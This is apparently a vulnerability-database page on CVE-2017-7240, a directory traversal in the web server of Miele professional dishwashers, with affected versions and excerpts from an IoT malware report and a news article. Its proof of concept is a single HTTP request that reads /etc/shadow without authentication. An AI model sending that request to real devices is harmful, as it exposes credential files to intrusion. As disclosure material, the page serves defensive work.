An issue exists on Miele Professional PST10 devices. The corresponding embedded webserver "PST10 WebServer" typically listens to port 80 and is prone to a directory traversal attack; therefore, an unauthenticated attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks. A Proof of Concept is GET /../../../../../../../../../../../../etc/shadow HTTP/1.1. This affects PG8527 devices 2.02 prior to 2.12, PG8527 devices 2.51 prior to 2.61, PG8527 devices 2.52 prior to 2.62, PG8527 devices 2.54 prior to 2.64, PG8528 devices 2.02 prior to 2.12, PG8528 devices 2.51 prior to 2.61, PG8528 devices 2.52 prior to 2.62, PG8528 devices 2.54 prior to 2.64, PG8535 devices 1.00 prior to 1.10, PG8535 devices 1.04 prior to 1.14, PG8536 devices 1.10 prior to 1.20, and PG8536 devices 1.14 prior to 1.24.
Vulnerable Product | Search on Vulmon | Subscribe to Product |
---|---|---|
miele_professional pst10_webserver - |
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead. We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets. !function(e,t,n,s){var...
Thanks a Miele-on for making everything dangerous, Internet of Things firmware slackers
Don't say you weren't warned: Miele went full Internet-of-Things with a network-connected dishwasher, gave it a web server, and now finds itself on the wrong end of a security bug report – and it's accused of ignoring the warning. The utterly predictable vulnerability advisory on the Full Disclosure mailing list details CVE-2017-7240 – aka "Miele Professional PG 8528 - Web Server Directory Traversal.” This is the builtin web server that's used to remotely control the glassware-cleaning mac...